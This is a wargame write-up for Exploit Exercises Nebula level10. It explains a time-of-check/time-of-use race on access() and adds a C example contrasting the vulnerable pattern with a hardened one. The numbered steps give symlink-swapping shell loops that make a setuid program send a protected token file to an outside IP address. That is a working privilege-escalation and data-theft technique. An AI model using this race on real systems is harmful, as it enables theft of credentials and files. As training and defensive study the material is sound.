June 30, 2016 Karn Ganeshen

Exploit Exercises – nebula level10

Researching the requirements of access(), we find this:

The level10 directory has a file x which contains the token (the password) for flag10. It shouldn't be there, and we don't have access to the token itself, so we need to find a way to transfer the token file.

We will need to exploit the race condition (time-of-check vs. time-of-use) around the access() calls used in the program code:

Checking how flag10 works normally:

Ok.

The following steps are needed to exploit the access() race condition:
  1. Create a fake token file – echo fake_token > /tmp/fake_token
  2. Create a soft link to our fake token – ln -sf /tmp/fake_token token
  3. Create a soft link to the real token with the same name – ln -s /home/flag10/token token
  4. Execute the two ln commands from steps 2 and 3 in a loop – while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute the file transfer in a loop – while true; do /home/flag10/flag10 token 192.168.49.1; done
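The race the steps above depend on, and the way a setuid program avoids it, as an added C example (not the flag10 source from the exercise): open_checked_then_opened() is the access()-then-open() pattern the level relies on, open_verified() is a hardened replacement that checks the already-open descriptor instead of the path; the function names, demo_symlink_behaviour() and the /tmp file names are constructed for this example.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern flag10 relies on: access() tests the real uid's permission on
 * the path, then open() runs with the setuid program's effective uid, and the
 * path can be repointed between the two calls. Returns an fd, or -1. */
int open_checked_then_opened(const char *path)
{
    if (access(path, R_OK) != 0)
        return -1;
    return open(path, O_RDONLY);
}

/* Hardened variant: one open() that refuses symlinks, then fstat() on the open
 * descriptor (regular file, owned by the real uid): check and use share an inode. */
int open_verified(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed demo (made-up names): a temp file we own plus a symlink to it.
 * Returns 1 if the first variant follows the link and the hardened one refuses it. */
int demo_symlink_behaviour(void)
{
    char file[] = "/tmp/level10_demo_XXXXXX";
    const char *link = "/tmp/level10_demo_link";
    int fd = mkstemp(file);
    if (fd < 0) return 0;
    close(fd); unlink(link);            /* clear a stale link from a prior run */
    if (symlink(file, link) != 0) { unlink(file); return 0; }
    int a = open_checked_then_opened(link);   /* follows the link: opens */
    int b = open_verified(link);              /* O_NOFOLLOW: refused (ELOOP) */
    int c = open_verified(file);              /* direct path, our file: opens */
    int ok = a >= 0 && b < 0 && c >= 0;
    if (a >= 0) close(a);
    if (c >= 0) close(c);
    unlink(link); unlink(file);
    return ok;
}
```

The demo cannot reproduce the timing window itself; it shows why the hardened variant is indifferent to the path being swapped, since every decision is made on the descriptor it already holds.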
Token is transferred successfully. Use it to log in as flag10 and run getflag.
